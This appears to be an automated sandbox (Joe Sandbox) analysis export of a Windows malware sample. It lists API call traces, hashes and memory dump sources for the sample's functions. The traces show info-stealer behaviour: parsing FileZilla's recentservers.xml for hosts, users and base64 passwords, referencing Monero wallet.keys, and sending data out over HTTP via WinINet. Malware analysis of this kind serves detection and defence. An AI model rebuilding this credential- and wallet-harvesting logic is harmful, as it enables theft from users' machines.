                                  • Opcode ID: 9e4249c939e2011bf8b7bd6819da4a990df327e71029e3d899a4f8e9817020f6
                                  • Instruction ID: da6710e8a90274b45f7c70e485e0238d2b2e03614fd76643cfdb22ca0d926c65
                                  • Opcode Fuzzy Hash: 9e4249c939e2011bf8b7bd6819da4a990df327e71029e3d899a4f8e9817020f6
                                  • Instruction Fuzzy Hash: F3412BF3D082189BE3146E29EC8436AB7D5AB98320F5B853DDAD897744D8391C058686
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                  • Instruction ID: cf656d4d8692a8234e9002433ac90fae4e5007cb96553996822d99f6ad105555
                                  • Opcode Fuzzy Hash: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                  • Instruction Fuzzy Hash: D0511962E09BD985CB058B7544502EEBFB25FE6210F1E829EC49C1B382C3799689D3E5
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 203fdfba8624976aa1052da8e2df1778bbfc242949ba4745d7b081616696dd07
                                  • Instruction ID: 4ea19263bf50a0c6e209e7613676922360811fc9dbd06bdf37b13d291446c94c
                                  • Opcode Fuzzy Hash: 203fdfba8624976aa1052da8e2df1778bbfc242949ba4745d7b081616696dd07
                                  • Instruction Fuzzy Hash: 253157F3B046105BE3001E3EED987ABBBDAEBD4720F5B463ED985C3B40D43598058692
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dffa8fe14fb17786e60520bf3c8c8ace1f347de8b7b0a65a7913e683934b358a
                                  • Instruction ID: 6f3579539133c16e82723237803b8971b03cd8b531f9f429ebb9f832563e04b3
                                  • Opcode Fuzzy Hash: dffa8fe14fb17786e60520bf3c8c8ace1f347de8b7b0a65a7913e683934b358a
                                  • Instruction Fuzzy Hash: 27D0C971A097118FC3688F1EF440546FAE8EBD8320715C53FA09EC3750C6B494418B54
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                  • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                  • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                  • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                  APIs
                                    • Part of subcall function 0071AA50: lstrcpy.KERNEL32(00720E1A,00000000), ref: 0071AA98
                                    • Part of subcall function 00718F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00718F9B
                                    • Part of subcall function 0071AC30: lstrcpy.KERNEL32(00000000,?), ref: 0071AC82
                                    • Part of subcall function 0071AC30: lstrcat.KERNEL32(00000000), ref: 0071AC92
                                    • Part of subcall function 0071ABB0: lstrcpy.KERNEL32(?,00720E1A), ref: 0071AC15
                                    • Part of subcall function 0071ACC0: lstrlen.KERNEL32(?,011D8F90,?,\Monero\wallet.keys,00720E1A), ref: 0071ACD5
                                    • Part of subcall function 0071ACC0: lstrcpy.KERNEL32(00000000), ref: 0071AD14
                                    • Part of subcall function 0071ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0071AD22
                                    • Part of subcall function 0071AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0071AAF6
                                    • Part of subcall function 0070A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0070A13C
                                    • Part of subcall function 0070A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0070A161
                                    • Part of subcall function 0070A110: LocalAlloc.KERNEL32(00000040,?), ref: 0070A181
                                    • Part of subcall function 0070A110: ReadFile.KERNEL32(000000FF,?,00000000,0070148F,00000000), ref: 0070A1AA
                                    • Part of subcall function 0070A110: LocalFree.KERNEL32(0070148F), ref: 0070A1E0
                                    • Part of subcall function 0070A110: CloseHandle.KERNEL32(000000FF), ref: 0070A1EA
                                    • Part of subcall function 00718FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00718FE2
                                  • GetProcessHeap.KERNEL32(00000000,000F423F,00720DBF,00720DBE,00720DBB,00720DBA), ref: 007104C2
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 007104C9
                                  • StrStrA.SHLWAPI(00000000,<Host>), ref: 007104E5
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00720DB7), ref: 007104F3
                                  • StrStrA.SHLWAPI(00000000,<Port>), ref: 0071052F
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00720DB7), ref: 0071053D
                                  • StrStrA.SHLWAPI(00000000,<User>), ref: 00710579
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00720DB7), ref: 00710587
                                  • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 007105C3
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00720DB7), ref: 007105D5
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00720DB7), ref: 00710662
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00720DB7), ref: 0071067A
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00720DB7), ref: 00710692
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00720DB7), ref: 007106AA
                                  • lstrcat.KERNEL32(?,browser: FileZilla), ref: 007106C2
                                  • lstrcat.KERNEL32(?,profile: null), ref: 007106D1
                                  • lstrcat.KERNEL32(?,url: ), ref: 007106E0
                                  • lstrcat.KERNEL32(?,00000000), ref: 007106F3
                                  • lstrcat.KERNEL32(?,00721770), ref: 00710702
                                  • lstrcat.KERNEL32(?,00000000), ref: 00710715
                                  • lstrcat.KERNEL32(?,00721774), ref: 00710724
                                  • lstrcat.KERNEL32(?,login: ), ref: 00710733
                                  • lstrcat.KERNEL32(?,00000000), ref: 00710746
                                  • lstrcat.KERNEL32(?,00721780), ref: 00710755
                                  • lstrcat.KERNEL32(?,password: ), ref: 00710764
                                  • lstrcat.KERNEL32(?,00000000), ref: 00710777
                                  • lstrcat.KERNEL32(?,00721790), ref: 00710786
                                  • lstrcat.KERNEL32(?,00721794), ref: 00710795
                                  • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00720DB7), ref: 007107EE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                  • API String ID: 1942843190-555421843
                                  • Opcode ID: 00c1fd1e0cc010986a27584b645c2fbfd77bd29c8a247b712be34a607aba7d67
                                  • Instruction ID: a172a3c444d2a837d8603d7d2e04b1dd0db8133b5a0e77ca9e732b2906b1c5fa
                                  • Opcode Fuzzy Hash: 00c1fd1e0cc010986a27584b645c2fbfd77bd29c8a247b712be34a607aba7d67
                                  • Instruction Fuzzy Hash: BFD182B5A55208FBCB04EBF8DD5AEEEB339AF54310F408555F102760D1EE38AA84CB61
                                  APIs
                                    • Part of subcall function 0071AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0071AAF6
                                    • Part of subcall function 00704800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00704889
                                    • Part of subcall function 00704800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00704899
                                    • Part of subcall function 0071AA50: lstrcpy.KERNEL32(00720E1A,00000000), ref: 0071AA98
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00705A48
                                  • StrCmpCA.SHLWAPI(?,011DE920), ref: 00705A63
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00705BE3
                                  • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,011DE9B0,00000000,?,011DA7D8,00000000,?,00721B4C), ref: 00705EC1
                                  • lstrlen.KERNEL32(00000000), ref: 00705ED2
                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00705EE3
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00705EEA
                                  • lstrlen.KERNEL32(00000000), ref: 00705EFF
                                  • lstrlen.KERNEL32(00000000), ref: 00705F28
                                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00705F41
                                  • lstrlen.KERNEL32(00000000,?,?), ref: 00705F6B
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00705F7F
                                  • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00705F9C
                                  • InternetCloseHandle.WININET(00000000), ref: 00706000
                                  • InternetCloseHandle.WININET(00000000), ref: 0070600D
                                  • HttpOpenRequestA.WININET(00000000,011DE8C0,?,011DE3B0,00000000,00000000,00400100,00000000), ref: 00705C48
                                    • Part of subcall function 0071ACC0: lstrlen.KERNEL32(?,011D8F90,?,\Monero\wallet.keys,00720E1A), ref: 0071ACD5
                                    • Part of subcall function 0071ACC0: lstrcpy.KERNEL32(00000000), ref: 0071AD14
                                    • Part of subcall function 0071ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0071AD22
                                    • Part of subcall function 0071ABB0: lstrcpy.KERNEL32(?,00720E1A), ref: 0071AC15
                                    • Part of subcall function 0071AC30: lstrcpy.KERNEL32(00000000,?), ref: 0071AC82
                                    • Part of subcall function 0071AC30: lstrcat.KERNEL32(00000000), ref: 0071AC92
                                  • InternetCloseHandle.WININET(00000000), ref: 00706017
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                  • String ID: "$"$------$------$------
                                  • API String ID: 874700897-2180234286
                                  • Opcode ID: 8755d641a8fab9e0e5ed35c663d20859ddee6d049bed9c75cf9f22a7479a88a2
                                  • Instruction ID: 0e48ad706a2e1703498dcf12772356a6361b6f205688c2807596465af38936a6
                                  • Opcode Fuzzy Hash: 8755d641a8fab9e0e5ed35c663d20859ddee6d049bed9c75cf9f22a7479a88a2
                                  • Instruction Fuzzy Hash: 3612EEB1965118FBCB25EBA4DCA9FEEB379BF14710F004199F106620D1EF742A88CB65
                                  APIs
                                    • Part of subcall function 0071AA50: lstrcpy.KERNEL32(00720E1A,00000000), ref: 0071AA98
                                    • Part of subcall function 0071ACC0: lstrlen.KERNEL32(?,011D8F90,?,\Monero\wallet.keys,00720E1A), ref: 0071ACD5
                                    • Part of subcall function 0071ACC0: lstrcpy.KERNEL32(00000000), ref: 0071AD14
                                    • Part of subcall function 0071ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0071AD22
                                    • Part of subcall function 0071ABB0: lstrcpy.KERNEL32(?,00720E1A), ref: 0071AC15
                                    • Part of subcall function 00718CF0: GetSystemTime.KERNEL32(00720E1B,011DA4D8,007205B6,?,?,007013F9,?,0000001A,00720E1B,00000000,?,011D8F90,?,\Monero\wallet.keys,00720E1A), ref: 00718D16
                                    • Part of subcall function 0071AC30: lstrcpy.KERNEL32(00000000,?), ref: 0071AC82
                                    • Part of subcall function 0071AC30: lstrcat.KERNEL32(00000000), ref: 0071AC92
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0070D083
                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0070D1C7
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0070D1CE
                                  • lstrcat.KERNEL32(?,00000000), ref: 0070D308
                                  • lstrcat.KERNEL32(?,00721570), ref: 0070D317
                                  • lstrcat.KERNEL32(?,00000000), ref: 0070D32A
                                  • lstrcat.KERNEL32(?,00721574), ref: 0070D339
                                  • lstrcat.KERNEL32(?,00000000), ref: 0070D34C
                                  • lstrcat.KERNEL32(?,00721578), ref: 0070D35B
                                  • lstrcat.KERNEL32(?,00000000), ref: 0070D36E
                                  • lstrcat.KERNEL32(?,0072157C), ref: 0070D37D
                                  • lstrcat.KERNEL32(?,00000000), ref: 0070D390
                                  • lstrcat.KERNEL32(?,00721580), ref: 0070D39F
                                  • lstrcat.KERNEL32(?,00000000), ref: 0070D3B2
                                  • lstrcat.KERNEL32(?,00721584), ref: 0070D3C1
                                  • lstrcat.KERNEL32(?,00000000), ref: 0070D3D4
                                  • lstrcat.KERNEL32(?,00721588), ref: 0070D3E3
                                    • Part of subcall function 0071AB30: lstrlen.KERNEL32(00704F55,?,?,00704F55,00720DDF), ref: 0071AB3B
                                    • Part of subcall function 0071AB30: lstrcpy.KERNEL32(00720DDF,00000000), ref: 0071AB95
                                  • lstrlen.KERNEL32(?), ref: 0070D42A
                                  • lstrlen.KERNEL32(?), ref: 0070D439
                                    • Part of subcall function 0071AD80: StrCmpCA.SHLWAPI(00000000,00721568,0070D2A2,00721568,00000000), ref: 0071AD9F
                                  • DeleteFileA.KERNEL32(00000000), ref: 0070D4B4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                  • String ID:
                                  • API String ID: 1956182324-0
                                  • Opcode ID: 267b36365ac717ae6958b15ddecaf6e1fa1e8738566704a3bc73d7e5ebbda375
                                  • Instruction ID: 84b5332a403b4c9187314b363ed3a9cacb2ee95d0632f46d28131f7f6fc3a441
                                  • Opcode Fuzzy Hash: 267b36365ac717ae6958b15ddecaf6e1fa1e8738566704a3bc73d7e5ebbda375
                                  • Instruction Fuzzy Hash: 45E152B1A55118FBCB14EBE4ED5AEEEB379AF14301F004155F106760E1EE38AE88CB61
                                  APIs
                                    • Part of subcall function 0071AA50: lstrcpy.KERNEL32(00720E1A,00000000), ref: 0071AA98
                                    • Part of subcall function 0071AC30: lstrcpy.KERNEL32(00000000,?), ref: 0071AC82
                                    • Part of subcall function 0071AC30: lstrcat.KERNEL32(00000000), ref: 0071AC92
                                    • Part of subcall function 0071ABB0: lstrcpy.KERNEL32(?,00720E1A), ref: 0071AC15
                                    • Part of subcall function 0071ACC0: lstrlen.KERNEL32(?,011D8F90,?,\Monero\wallet.keys,00720E1A), ref: 0071ACD5
                                    • Part of subcall function 0071ACC0: lstrcpy.KERNEL32(00000000), ref: 0071AD14
                                    • Part of subcall function 0071ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0071AD22
                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,011DD490,00000000,?,00721544,00000000,?,?), ref: 0070CB6C
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0070CB89
                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0070CB95
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0070CBA8
                                  • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0070CBD9
                                  • StrStrA.SHLWAPI(?,011DD238,00720B56), ref: 0070CBF7
                                  • StrStrA.SHLWAPI(00000000,011DD4A8), ref: 0070CC1E
                                  • StrStrA.SHLWAPI(?,011DD968,00000000,?,00721550,00000000,?,00000000,00000000,?,011D9230,00000000,?,0072154C,00000000,?), ref: 0070CDA2
                                  • StrStrA.SHLWAPI(00000000,011DD808), ref: 0070CDB9
                                    • Part of subcall function 0070C920: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0070C971
                                    • Part of subcall function 0070C920: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0070C97C
                                  • StrStrA.SHLWAPI(?,011DD808,00000000,?,00721554,00000000,?,00000000,011D9200), ref: 0070CE5A
                                  • StrStrA.SHLWAPI(00000000,011D8F30), ref: 0070CE71
                                    • Part of subcall function 0070C920: lstrcat.KERNEL32(?,00720B47), ref: 0070CA43
                                    • Part of subcall function 0070C920: lstrcat.KERNEL32(?,00720B4B), ref: 0070CA57
                                    • Part of subcall function 0070C920: lstrcat.KERNEL32(?,00720B4E), ref: 0070CA78
